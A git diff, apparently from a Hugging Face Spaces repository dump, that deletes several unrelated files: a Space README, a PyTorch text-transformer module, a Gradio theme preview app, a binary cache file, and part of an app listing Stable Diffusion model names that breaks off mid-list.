b/spaces/OtmanSarrhini/foodvision_mini/README.md deleted file mode 100644 index 157c965b94dc10d7791c34f10010baf15be2891a..0000000000000000000000000000000000000000 --- a/spaces/OtmanSarrhini/foodvision_mini/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Foodvision Mini -emoji: 🏃 -colorFrom: pink -colorTo: yellow -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py b/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py deleted file mode 100644 index d0b7292018ecfbf4111c0da9c90444d0e1e41cb6..0000000000000000000000000000000000000000 --- a/spaces/PAIR/PAIR-Diffusion/annotator/OneFormer/oneformer/modeling/transformer_decoder/text_transformer.py +++ /dev/null @@ -1,257 +0,0 @@ -# ------------------------------------------------------------------------- -# MIT License -# -# Copyright (c) 2021 OpenAI -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -# ------------------------------------------------------------------------- - -import torch -import torch.utils.checkpoint as checkpoint -from torch import nn -from collections import OrderedDict -from timm.models.layers import trunc_normal_ - -class Attention(nn.Module): - def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.): - super().__init__() - self.num_heads = num_heads - head_dim = dim // num_heads - # NOTE scale factor was wrong in my original version, can set manually to be compat with prev weights - self.scale = qk_scale or head_dim ** -0.5 - - self.q_proj = nn.Linear(dim, dim, bias=qkv_bias) - self.k_proj = nn.Linear(dim, dim, bias=qkv_bias) - self.v_proj = nn.Linear(dim, dim, bias=qkv_bias) - - - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - def forward(self, q, k, v): - B, N, C = q.shape - assert k.shape == v.shape - B, M, C = k.shape - q = self.q_proj(q).reshape(B, N, self.num_heads, C // self.num_heads) - k = self.k_proj(k).reshape(B, M, self.num_heads, C // self.num_heads) - v = self.v_proj(v).reshape(B, M, self.num_heads, C // self.num_heads) - - attn = torch.einsum('bnkc,bmkc->bknm', q, k) * self.scale - - attn = attn.softmax(dim=-1) - - x = torch.einsum('bknm,bmkc->bnkc', attn, v).reshape(B, N, C) - - x = self.proj(x) - x = self.proj_drop(x) - return x - -class TransformerDecoderLayer(nn.Module): - def __init__( - self, - d_model, - nhead, - dropout=0.1, - ): - super().__init__() - self.self_attn = Attention(d_model, nhead, proj_drop=dropout) - self.cross_attn = Attention(d_model, nhead, proj_drop=dropout) - - self.norm1 = nn.LayerNorm(d_model) - self.norm2 = nn.LayerNorm(d_model) - self.norm3 = nn.LayerNorm(d_model) - self.dropout = nn.Dropout(dropout) - - self.mlp = nn.Sequential( - nn.Linear(d_model, d_model * 4), - nn.GELU(), - nn.Dropout(dropout), - nn.Linear(d_model * 4, d_model) - ) - - def forward(self, x, mem): - q = k = v = self.norm1(x) - x = x + self.self_attn(q, k, v) - q = self.norm2(x) - x = x + self.cross_attn(q, mem, mem) - x = x + self.dropout(self.mlp(self.norm3(x))) - return x - - -class ContextDecoder(nn.Module): - def __init__(self, - transformer_width=256, - transformer_heads=4, - transformer_layers=6, - visual_dim=1024, - dropout=0.1, - **kwargs): - super().__init__() - - self.memory_proj = nn.Sequential( - nn.LayerNorm(visual_dim), - nn.Linear(visual_dim, transformer_width), - nn.LayerNorm(transformer_width), - ) - - self.text_proj = nn.Sequential( - nn.LayerNorm(visual_dim), - nn.Linear(visual_dim, transformer_width), - ) - - self.decoder = nn.ModuleList([ - TransformerDecoderLayer(transformer_width, transformer_heads, dropout) for _ in range(transformer_layers) - ]) - - self.out_proj = nn.Sequential( - nn.LayerNorm(transformer_width), - nn.Linear(transformer_width, visual_dim) - ) - - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - trunc_normal_(m.weight, std=.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - - def forward(self, text, visual): - B, N, C = visual.shape - visual = self.memory_proj(visual) - x = self.text_proj(text) - - for layer in self.decoder: - x = layer(x, visual) - - return self.out_proj(x) - - -class QuickGELU(nn.Module): - - def forward(self, x: torch.Tensor): - return x * torch.sigmoid(1.702 * x) - - -class ResidualAttentionBlock(nn.Module): - - def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None): - super().__init__() - - self.attn = nn.MultiheadAttention(d_model, n_head) - self.ln_1 = nn.LayerNorm(d_model) - self.mlp = nn.Sequential( - OrderedDict([('c_fc', nn.Linear(d_model, d_model * 4)), ('gelu', QuickGELU()), - ('c_proj', nn.Linear(d_model * 4, d_model))])) - self.ln_2 = nn.LayerNorm(d_model) - self.attn_mask = attn_mask - - def attention(self, x: torch.Tensor, key_padding_mask: torch.Tensor): - self.attn_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None - return self.attn(x, x, x, need_weights=False, attn_mask=self.attn_mask, key_padding_mask=key_padding_mask)[0] - - def forward(self, x: torch.Tensor, key_padding_mask=None): - x = x + self.attention(self.ln_1(x), key_padding_mask=key_padding_mask) - x = x + self.mlp(self.ln_2(x)) - return x - -class Transformer(nn.Module): - - def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None, use_checkpoint=False): - super().__init__() - self.width = width - self.layers = layers - self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)]) - proj_std = (self.width**-0.5) * ((2 * self.layers)**-0.5) - attn_std = self.width**-0.5 - fc_std = (2 * self.width)**-0.5 - for block in self.resblocks: - nn.init.normal_(block.attn.in_proj_weight, std=attn_std) - nn.init.normal_(block.attn.out_proj.weight, std=proj_std) - nn.init.normal_(block.mlp.c_fc.weight, std=fc_std) - nn.init.normal_(block.mlp.c_proj.weight, std=proj_std) - - self.use_checkpoint = use_checkpoint - - def forward(self, x: torch.Tensor): - for resblock in self.resblocks: - if self.use_checkpoint: - x = checkpoint.checkpoint(resblock, x) - else: - x = resblock(x) - return x - - -class TextTransformer(nn.Module): - - def __init__( - self, - context_length: int, - width: int, - layers: int, - vocab_size, - use_checkpoint=False, - ): - - super().__init__() - heads = width // 64 - self.context_length = context_length - self.width = width - self.transformer = Transformer( - width=width, - layers=layers, - heads=heads, - attn_mask=self.build_attention_mask(), - use_checkpoint=use_checkpoint) - - self.positional_embedding = nn.Parameter(torch.empty(self.context_length, width)) - self.ln_final = nn.LayerNorm(width) - self.token_embedding = nn.Embedding(vocab_size, width) - nn.init.normal_(self.token_embedding.weight, std=0.02) - - # initialization - nn.init.normal_(self.positional_embedding, std=0.01) - - def build_attention_mask(self): - # lazily create causal attention mask, with full attention between the vision tokens - # pytorch uses additive attention mask; fill with -inf - mask = torch.empty(self.context_length, self.context_length) - mask.fill_(float('-inf')) - mask.triu_(1) # zero out the lower diagonal - return mask - - def forward(self, text): - x = self.token_embedding(text) - x = x + self.positional_embedding - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x) - x = x.permute(1, 0, 2) # LND -> NLD - x = self.ln_final(x) - - # x.shape = [batch_size, n_ctx, transformer.width] - # take features from the eot embedding (eot_token is the highest number in each sequence) - x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] - - return x \ No newline at end of file diff --git a/spaces/ParityError/Anime/app.py b/spaces/ParityError/Anime/app.py deleted file mode 100644 index b92b6e698070d57e2679aad9a4459d062e189d7e..0000000000000000000000000000000000000000 --- a/spaces/ParityError/Anime/app.py +++ /dev/null @@ -1,147 +0,0 @@ -import time - -from theme_dropdown import create_theme_dropdown # noqa: F401 - -import gradio as gr - -dropdown, js = create_theme_dropdown() - -with gr.Blocks(theme='ParityError/Anime') as demo: - with gr.Row().style(equal_height=True): - with gr.Column(scale=10): - gr.Markdown( - """ - # Theme preview: `Anime` - To use this theme, set `theme='ParityError/Anime'` in `gr.Blocks()` or `gr.Interface()`. - You can append an `@` and a semantic version expression, e.g. @>=1.0.0,<2.0.0 to pin to a given version - of this theme. - """ - ) - with gr.Column(scale=3): - with gr.Box(): - dropdown.render() - toggle_dark = gr.Button(value="Toggle Dark").style(full_width=True) - - dropdown.change(None, dropdown, None, _js=js) - toggle_dark.click( - None, - _js=""" - () => { - document.body.classList.toggle('dark'); - document.querySelector('gradio-app').style.backgroundColor = 'var(--neutral-700)' - } - """, - ) - - name = gr.Textbox( - label="Name", - info="Full name, including middle name. No special characters.", - placeholder="John Doe", - value="John Doe", - interactive=True, - ) - - with gr.Row(): - slider1 = gr.Slider(label="Slider 1") - slider2 = gr.Slider(label="Slider 2") - gr.CheckboxGroup(["A", "B", "C"], label="Checkbox Group") - - with gr.Row(): - with gr.Column(variant="panel", scale=1): - gr.Markdown("## Panel 1") - radio = gr.Radio( - ["A", "B", "C"], - label="Radio", - info="Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.", - ) - drop = gr.Dropdown(["Option 1", "Option 2", "Option 3"], show_label=False) - drop_2 = gr.Dropdown( - ["Option A", "Option B", "Option C"], - multiselect=True, - value=["Option A"], - label="Dropdown", - interactive=True, - ) - check = gr.Checkbox(label="Go") - with gr.Column(variant="panel", scale=2): - img = gr.Image( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/header-image.jpg", label="Image" - ).style(height=320) - with gr.Row(): - go_btn = gr.Button("Go", label="Primary Button", variant="primary") - clear_btn = gr.Button( - "Clear", label="Secondary Button", variant="secondary" - ) - - def go(*args): - time.sleep(3) - return "https://gradio-static-files.s3.us-west-2.amazonaws.com/header-image.jpg" - - go_btn.click(go, [radio, drop, drop_2, check, name], img, api_name="go") - - def clear(): - time.sleep(0.2) - return None - - clear_btn.click(clear, None, img) - - with gr.Row(): - btn1 = gr.Button("Button 1").style(size="sm") - btn2 = gr.UploadButton().style(size="sm") - stop_btn = gr.Button("Stop", label="Stop Button", variant="stop").style( - size="sm" - ) - - with gr.Row(): - gr.Dataframe(value=[[1, 2, 3], [4, 5, 6], [7, 8, 9]], label="Dataframe") - gr.JSON( - value={"a": 1, "b": 2, "c": {"test": "a", "test2": [1, 2, 3]}}, label="JSON" - ) - gr.Label(value={"cat": 0.7, "dog": 0.2, "fish": 0.1}) - gr.File() - with gr.Row(): - gr.ColorPicker() - gr.Video("https://gradio-static-files.s3.us-west-2.amazonaws.com/world.mp4") - gr.Gallery( - [ - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/lion.jpg", - "lion", - ), - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/logo.png", - "logo", - ), - ( - "https://gradio-static-files.s3.us-west-2.amazonaws.com/tower.jpg", - "tower", - ), - ] - ).style(height="200px", grid=2) - - with gr.Row(): - with gr.Column(scale=2): - chatbot = gr.Chatbot([("Hello", "Hi")], label="Chatbot") - chat_btn = gr.Button("Add messages") - - def chat(history): - time.sleep(2) - yield [["How are you?", "I am good."]] - - chat_btn.click( - lambda history: history - + [["How are you?", "I am good."]] - + (time.sleep(2) or []), - chatbot, - chatbot, - ) - with gr.Column(scale=1): - with gr.Accordion("Advanced Settings"): - gr.Markdown("Hello") - gr.Number(label="Chatbot control 1") - gr.Number(label="Chatbot control 2") - gr.Number(label="Chatbot control 3") - - -if __name__ == "__main__": - demo.queue().launch() diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go deleted file mode 100644 index 031c4b8973d79c377e10417f0b8f7f9fe360420e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/lily.go and /dev/null differ diff --git a/spaces/PeepDaSlan9/ToyWorld/app.py b/spaces/PeepDaSlan9/ToyWorld/app.py deleted file mode 100644 index be153e50067222ab8fec8c2a8a543e65c5ffd670..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/ToyWorld/app.py +++ /dev/null @@ -1,1181 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - "Yntec/Classic", - "Yntec/mistoonAnime2", - "Yntec/DucHaiten-FANCYxFANCY", - "Yntec/3DCute", - "Yntec/AbsoluteRemix", - "Yntec/AbsoluteReality", - "Yntec/epiCRealismVAE", - "Yntec/OpenNijiRemix", - "Yntec/LAMEanime", - "Yntec/potatoMash", - "Yntec/epiCPhotoGasm", - "Yntec/lamettaNightly", - "Yntec/RealCartoon3D", - "Yntec/Oiran", - "Yntec/elldrethSVividMix", - "Yntec/3Danimation", - "Yntec/Darkside", #1K - "Yntec/nuipenimix2", #1K - "Yntec/dosmixVAE", #1K - "Yntec/elldrethSLucidMix", #1K - "Yntec/DucHaitenNiji", #1K - "Yntec/Citrus", #1K - "Yntec/SuperCuteRemix", #2K - "Yntec/NaughtyChildren", #3K - "Yntec/edgeOfRealism", #3K - "Yntec/HitenDiffusion", #1K - "Yntec/Splash", #4K - "Yntec/animeSEXTILLION/", #6K - "Yntec/CitrineDreamMix", #1K - "Yntec/animeTEN", #3K - "Yntec/level4", #3K - "Yntec/elldrethsImagination", #2K - "Yntec/BeenYou", #2K - "Yntec/animeTWO", #4K - "Yntec/LehinaModel", #7K - "Yntec/Trending", - "Yntec/aMovieTrend", - "Yntec/aPhotographicTrend", - "Yntec/photoMovieXFinal", - "Yntec/aMovieX/", - "Yntec/GoldenEra", - "Yntec/Hassanim", - "Yntec/3DCuteWave", - "Yntec/ClassicEra", - "Yntec/GoodLife", - "Yntec/DucHaiten-GoldenLife", - "Yntec/BasilRemix", - "Yntec/ReVAnimated768", - "Yntec/lamettaRemix", - "Yntec/lametta", - "Yntec/vividicAnime", - "Yntec/Dreamscape", - "Yntec/NeverEndingDream768", - "Yntec/HassanBlend12", - "Yntec/HassanBlend1512VAE", - "Yntec/REV", - "Yntec/CetusRemix", - "Yntec/Dreamscapes_n_Dragonfire_v2", - "Yntec/Cetus", - "Yntec/RadiantCinemagic", - "Yntec/RadiantVibes", - "Yntec/OpenGenDiffusers", - "Yntec/Dreamlike", - "Yntec/DeliberateRemix", - "Yntec/DreamShaperRemix", - "Yntec/DeliShaper", - "Yntec/dreamlike-photoreal-remix", - "Yntec/epiCVision", - "Yntec/realistic-vision-v12", - "Yntec/MangledMerge3_768", - "Yntec/OpenLexica", - "Yntec/DreamLikeRemix", - "Yntec/humu", - "Linaqruf/animagine-xl", - "nerijs/pixel-art-xl", - "Yntec/MapleSyrup", - "Yntec/WoopWoopRemix", - "Yntec/ArcticFowl", - "Yntec/iComixRemix", - "Yntec/SamaritanDoesArt", - "Yntec/samaritan3dCartoon2MVAE", - "Yntec/CartoonStyleClassic", - "Yntec/CultClassic", - "Yntec/CinemaE", - "Yntec/GalenaVAE", - "Yntec/a-ZovyaRemix", - "Yntec/a-ZovyaRPGV3VAE", - "Yntec/Infinite80s", - "Yntec/a-ZoviaRPGArtistV2VAE", - "Yntec/GameAssetsDigitalUnitsCreationKit", - "Yntec/QToriReloaded", - "Yntec/Toonify2", - "Yntec/LunarLuma", - "Yntec/Lunar", - "Yntec/Chik2", - "Yntec/photoMovieRealistic", - "Yntec/DucHaiten-StyleLikeMeVAE", - "Yntec/InsaneRealisticCVAE", - "Yntec/Noosphere_v3_CVAE", - "Yntec/RealRainbows", - "Yntec/InsaneM3U", - "Yntec/ChildrenStoriesAnime", - "Yntec/theallysMixIV-verisimilar", - "Yntec/DucHaitenAnime768", - "Yntec/RainbowClassicAnime", - "Yntec/DucHaitenClassicAnime768", - "Yntec/Luma", - "Yntec/WesternAnimation", - "Yntec/NeverExisted", - "Yntec/Rainbowsphere", - "Yntec/Ninja-Diffusers", - "Yntec/GOLDFish", - "Yntec/DreamAnything", - "Yntec/Dreamsphere", - "Yntec/Photosphere", - "Yntec/yabalMixTrue25D_v2_VAE", - "dreamlike-art/dreamlike-anime-1.0", - "Yntec/RainbowDreams", - "Yntec/rainbowpatch", - "Yntec/DucHaiten-Retro-Diffusers", - "Yntec/ElldrethsRetroMix_Diffusers", - "Yntec/sexyToons", - "Yntec/photoMovieX/", - "dreamlike-art/dreamlike-photoreal-2.0", - "dreamlike-art/dreamlike-diffusion-1.0", - "Yntec/CuteYuki2", - "Yntec/KIDSILLUSTRATIONS", - "Yntec/COOLKIDSV2", - "Yntec/Pavo-Mix-Diffusers", - "Yntec/RPG_Remix", - "Yntec/OrangeRemix", - "Yntec/PeachMix3", - "Yntec/DucHaitenAIart-beta", - "Yntec/samdoesartsUlt", - "Yntec/NovelAI", - "Yntec/NovelAIRemix", - "Yntec/Hiten", - "AIARTCHAN/AbyssHellHero", - "digiplay/OldFish_fix1.1.997_diffusers", - "digiplay/VoidnoiseCore_R0829", - "digiplay/MGM", - "digiplay/OldFish_v1.1", - "digiplay/AI-infinity-V1-fp16", - "digiplay/wantan25D_prototype", - "digiplay/PotoPhotoRealism_v1", - "digiplay/LunarDiffusion_v1.27", - "digiplay/insaneRealistic_v1", - "digiplay/OLDFish_2348_diffusers", - "digiplay/OldFish_v1.1_diffusers_recover", - "digiplay/OldFish_v1.1mix_hello", - "digiplay/OldFish_v1.1_personal_HDmix", - "digiplay/FishMix_v1", - "DucHaiten/DucHaitenDreamWorld", - "digiplay/LemonteaMixPainterly2_v1", - "digiplay/SweetMuse_diffusers", - "digiplay/Realisian_v1", - "Hius/DreamFul-V2", - "digiplay/m3u", #263 - "digiplay/RMHF_2.5D_v2", - "digiplay/FishMix_v1.1", - "stablediffusionapi/icomix-2", - "digiplay/Remedy", - "Hemlok/QuinceMix", - "digiplay/K-main", - "digiplay/LusterMix_v1.5_safetensors", #256 - "digiplay/perfectLewdFantasy_v1.01", - "digiplay/Opiate_v2", - "digiplay/PhotoSomnia_vFinal", - "digiplay/polla_mix_2.5D", - "stablediffusionapi/all-526-animated", - "AstraliteHeart/pony-diffusion", - "stablediffusionapi/chilloutmixsf", - "Masagin/Deliberate", #235 - "DucHaiten/DucHaitenSuperCute", - "stablediffusionapi/all-526", - "theintuitiveye/HARDblend", - "stablediffusionapi/cyberrealistic", - "stablediffusionapi/cusp-of-serenity", - "SG161222/Realistic_Vision_V1.4", - "digiplay/paulEberSRealismMix_v1", - "Ojimi/anime-kawai-diffusion", - "hassanblend/hassanblend1.4", - "digiplay/zodiac_eclipse_DAY1", - "claudfuen/photorealistic-fuen-v1", - "stablediffusionapi/chillout-app-factory", - "DucHaiten/DucHaitenJourney", - "robotjung/SemiRealMix", - "Joeythemonster/anything-midjourney-v-4-1", - "prompthero/midjourney-v4-diffusion", - "prompthero/openjourney-v4", - "x67/shortjourney", - "darkstorm2150/Protogen_v2.2_Official_Release", - "FredZhang7/paint-journey-v2", - "digiplay/PersonaStyleCheckpoint", - "darkstorm2150/Protogen_Infinity_Official_Release", - "PeggyWang/openjourney-v2", - "darkstorm2150/Protogen_x3.4_Official_Release", - "stablediffusionapi/deliberateappfactory", #236 - "digiplay/CrossoverMix_v2", - "stablediffusionapi/spybg", - "stablediffusionapi/dreamshaper-v6", #239 - "stablediffusionapi/the-ally", - "darkstorm2150/Protogen_x5.8_Official_Release", - "coreco/seek.art_MEGA", - "digiplay/BlankCanvas_v1", #07.11 - "digiplay/OnlyAnime_v2.3", - "Korakoe/OpenNiji", - "digiplay/Photon_v1", - "digiplay/Pika_v2", - "digiplay/RealCartoon3D_F16full_v3.1", #254 - "digiplay/realidefmix_3.5VAE", - "digiplay/realmixUnrealjourney_v1", - "digiplay/SyncMix_v1.5", - "digiplay/TWingshadow_v1.2", - "digiplay/V3_by_Hans_Asian", - "digiplay/whatamix_v1", - - "digiplay/2K", #216 - "digiplay/AIGEN_v1.4_diffusers", - "digiplay/asyncsMIX_v2", - "digiplay/BrickAndMortarMix_v2.0_diffusers", #224 - "digiplay/BeautyFool_v1.2VAE_pruned", - "digiplay/breakdomainrealistic_R2333", - "digiplay/CCTV2.5d_v1", #219 - "digiplay/ChikMix_V3", #253 - "stablediffusionapi/chilledremixsazyou-r", #195 - "digiplay/CityEdge_StyleMix_v1.44", - "stablediffusionapi/dalcefopainting2", #199 - "digiplay/EdisonNilMix_v1", #07.10 - "digiplay/DiamondCoalMix_v2_pruned_diffusers", - "digiplay/DreamShaper_7", #259 - "digiplay/elegantEntropy_v1.1", #221 - "digiplay/EtherRealMix_LUX2", - "digiplay/KawaiiRealisticAnimeMix_A0.3", - "digiplay/highQualityCGMIX_v1", - "digiplay/HIMAWARI_v1", - "digiplay/Hodgepodge_v2.1", #217 - "digiplay/illustro1stEdition_illustroV1", #214 - "digiplay/Juggernaut_final", #07.11 - "digiplay/Landscape_PhotoReal_v1", - "digiplay/LuckyStrikeMix0.2Realistic", #07.10 - "digiplay/Matrix_Stellar_VAE_v1", - "digiplay/PrefixRealisticMix_v1", - "digiplay/RealEpicMajicRevolution_v1", #07.11 - "digiplay/ShampooMix_4", #252 - "digiplay/ShowmakerMix_v1", - "digiplay/SoapMix2.5D_v1", - "digiplay/ZemiHR_v2_diffusers", - - "Redamancy2299/dreambooth", - "Lykon/DreamShaper", #240 - "trysem/DreamShaper-3.3", - "HusseinHE/hussein-deliberate-1000steps", #237 - "stablediffusionapi/majicmixfantasy", - "stablediffusionapi/majicmixsombre", #247 - "wavymulder/modelshoot", - "digiplay/ChillyMix_v1", #215 - "stablediffusionapi/foto-assisted-diffusion", #197 - "wavymulder/portraitplus", - "stablediffusionapi/chilloutmix-4264", - "stablediffusionapi/product-design", #194 - "kandinsky-community/kandinsky-2-1", #251 - - "digiplay/2.5DSET_diffusers", #227 - "digiplay/2-KWI", #213 - "digiplay/alstroemeriaMix_v1", - "wavymulder/Analog-Diffusion", - "digiplay/AniRealityMix_v1", #257 - "digiplay/ARRealVX1.1", - "digiplay/BadAnime_v1", - "digiplay/BasilKorea_v2", #07.11 - "digiplay/bluePencilRealistic_v01", - "digiplay/bra_v40_diffusers", - "digiplay/Burger_Mix_semiR2Lite", #222 - "digiplay/calicomixreal_v2.0_diffusers", - "digiplay/CampurSari_Gen1", - "digiplay/cocotifacute_v1", #07.10 - "digiplay/cosfMix_v1", #223 - "digiplay/CounterMix_v2", #211 - "digiplay/CuriousMerge2.5D_v5", - "digiplay/dosmix", - "digiplay/epi_2.5Dphotogodess_diffusers", - "stablediffusionapi/droodlyrielv15", - "digiplay/fantexi_v0.7", - "digiplay/fishmix_other_v1", - "digiplay/FormCleansingMix_v1", #228 - "digiplay/FumizukiMix_v1", - "digiplay/helloworld_v3", - "digiplay/HenmixArt_v1", - "digiplay/ISOmix_v3.22", - "digiplay/JF-Cu_v1", - "digiplay/kencanmix_v2.0beta", - "wavymulder/lomo-diffusion", - "stablediffusionapi/majicmixv5", #192 - "digiplay/mecha_musume_vivid_soft", - "digiplay/MiracleMixGlitter_v1", - "digiplay/MixTape_RocknRoll_v3punk_bake_fp16", - "digiplay/NextPhoto_v1", - "digiplay/Noosphere_v3", - "digiplay/nk15_diffusers", #230 - "digiplay/PeachMixsRelistic_R0", #262 - "wavymulder/timeless-diffusion", - "digiplay/WhiteDreamyHillMix_v1", #220 - "digiplay/ya3p_VAE", #258 - - "DucHaiten/DucHaitenAnime", - "DucHaiten/DucHaitenAIart", - "digiplay/BeenYouLiteL11_diffusers", - "Manseo/Colorful-v4.5-Plus", #244 - "Guizmus/SDArt_ChaosAndOrder", - "DucHaiten/DH_ClassicAnime", - "stablediffusionapi/disneypixar", - "johnslegers/epic-diffusion-v1.1", - "emilianJR/epiCRealism", - "johnslegers/epic-diffusion", - "digiplay/endlessMixRenatus_v1.1", #07.10 - "digiplay/fantasticAnime_diffusers", - "stablediffusionapi/ghostmix", - "Duskfallcrew/EpicMix_Realism", - "nitrosocke/Nitro-Diffusion", - "prompthero/openjourney", - "Guizmus/SDArt_something", - "DucHaiten/DucHaiten-StyleLikeMe", - "ddPn08/subtly", #250 - "22h/vintedois-diffusion-v0-1", - - "circulus/sd-anireal-v2.7", - "0xJustin/Dungeons-and-Diffusion", - "Guizmus/SDArt_AliceInDiffusionLand", - "stablediffusionapi/realistic-vision-v20-2047", - "redstonehero/RPG-v5-itr17_A10T", - - "stablediffusionapi/camelliamix25d", - "Guizmus/SDArt_cosmichorrors", - "DGSpitzer/DGSpitzer-Art-Diffusion", - "stablediffusionapi/emotion-puppeteer-v2", - "stablediffusionapi/fengjing", - "stablediffusionapi/fuwafuwamix", - "Fred99774/girlnew1", - "stablediffusionapi/majicmixrealistic", - "badmonk/nxka", - "ItsJayQz/SynthwavePunk-v2", - "zhyemmmm/ToonYou", - "stablediffusionapi/uber-realistic-merge", - "stablediffusionapi/vne732h9dh4", - "stablediffusionapi/wand-magic2", - "stablediffusionapi/waifu-journey-2", - "stablediffusionapi/zovya", - - "Guizmus/SDArt_cosmichorrors768", - "stablediffusionapi/counterfeit-v30", - "stablediffusionapi/amireal", - #"JamesFlare/pastel-mix", #"andite/pastel-mix", - "stablediffusionapi/rev-anim", - "aipicasso/picasso-diffusion-1-1", - "xiaolxl/Gf_style2", - "circulus/sd-semireal-v2.8", - "Crosstyan/BPModel", #07.11 - - "digiplay/Dusk-1", - "ogkalu/Comic-Diffusion", - "Guizmus/SDArt_ChaosAndOrder768", - "gsdf/Counterfeit-V2.0", - "dwancin/memoji", #07.11 - "nousr/robo-diffusion-2-base", - - ##"hakurei/waifu-diffusion", - "WarriorMama777/AbyssOrangeMix2", - "stablediffusionapi/abyssorangemix2nsfw", #200 - "cag/anything-v3-1", - "iZELX1/Anything-V3-X", - "xyn-ai/anything-v4.0", #"andite/anything-v4.0", - "D1b4l4p/AsianMix", - #"Fred99774/chilloutvlara", - "aipicasso/cool-japan-diffusion-2-1-2", - "stablediffusionapi/corneos-7th-heaven-m", #196 - "DGSpitzer/Cyberpunk-Anime-Diffusion", - "stablediffusionapi/dark-sushi-mix", - "joachimsallstrom/Double-Exposure-Diffusion", - "eimiss/EimisAnimeDiffusion_1.0v", - "prompthero/funko-diffusion", - "nitrosocke/Ghibli-Diffusion", - ###"iZELX1/Grapefruit", - "xiaolxl/GuoFeng3", - "stablediffusionapi/tmnd-mix", - "coder119/Vectorartz_Diffusion", #203 - - "WarriorMama777/AbyssOrangeMix", - "AIARTCHAN/7pa", - "JosephusCheung/ACertainModel", - "JosephusCheung/ACertainThing", - "JosephusCheung/ACertainty", - "AIARTCHAN/AbyssHellVer3", - "AIARTCHAN/AbyssMapleVer3", - "stablediffusionapi/abyssorangemixsfw", - "AIARTCHAN/anidosmixV2", - "stablediffusionapi/anime-model-v2", - "kubanemil/AnyLORA", - "stablediffusionapi/hc-anything-v3-vae", #231 - "mm00/anything-v3.0-light", - "stablediffusionapi/anythingelse-v4", - "stablediffusionapi/anything-v45-fixed", - "stablediffusionapi/anything-v5", - "nitrosocke/Arcane-Diffusion", - "nitrosocke/archer-diffusion", - "stablediffusionapi/architecture-tuned-model", - "WarriorMama777/BloodOrangeMix", - "wavymulder/collage-diffusion", - "stablediffusionapi/camelliamixline", - "digiplay/chrysanthemumMix_v1", - "digiplay/CiderMix_ciderR", #260 - "Johnhex/Clam", #243 - "stablediffusionapi/cosmic-babes", - "digiplay/CoffeeDonut_v1", - "stablediffusionapi/dark-sushi-25d", - "digiplay/Defacta_v1_diffusers", #226 - ## "WarriorMama777/EerieOrangeMix", - "digiplay/DuelAnimeMix_v1", #225 - "Envvi/Inkpunk-Diffusion", - "digiplay/kotosmix_diffusers", #229 - "stablediffusionapi/meinaalter", - "Nacholmo/meinamixv7-diffusers", - "stablediffusionapi/meinapastel", - "AIARTCHAN/MIX-Pro-V4", - "stablediffusionapi/shirataki-mix", #191 - "NoCrypt/SomethingV2_2", - "NoCrypt/SomethingV2", - "badmonk/sxzumi", - ## "stablediffusionapi/three-delicacy", - ## "stablediffusionapi/three-delicacy-wonto", - "etherealxx/systemy-csrmodel-cutesexyrobutts", #"andite/cutesexyrobutts-diffusion", - "sd-dreambooth-library/true-guweiz-style", # "andite/guweiz-diffusion", - "stablediffusionapi/vector-art", #198 - "digiplay/xxMix_4", - ###"mio/hiten", #"andite/hiten-diffusion", - ### "andite/mashuu-diffusion", - ### "andite/mignon-diffusion", - ### "andite/mikapikazo-diffusion", - ### "andite/piromizu-diffusion", - "digiplay/Zevinemix_v1.0/", - - "digiplay/AnaMix_v2", #07.11 - "stablediffusionapi/animetestmodelv3", - "yulet1de/anything", #232 - "hakurei/artstation-diffusion", #07.11 - 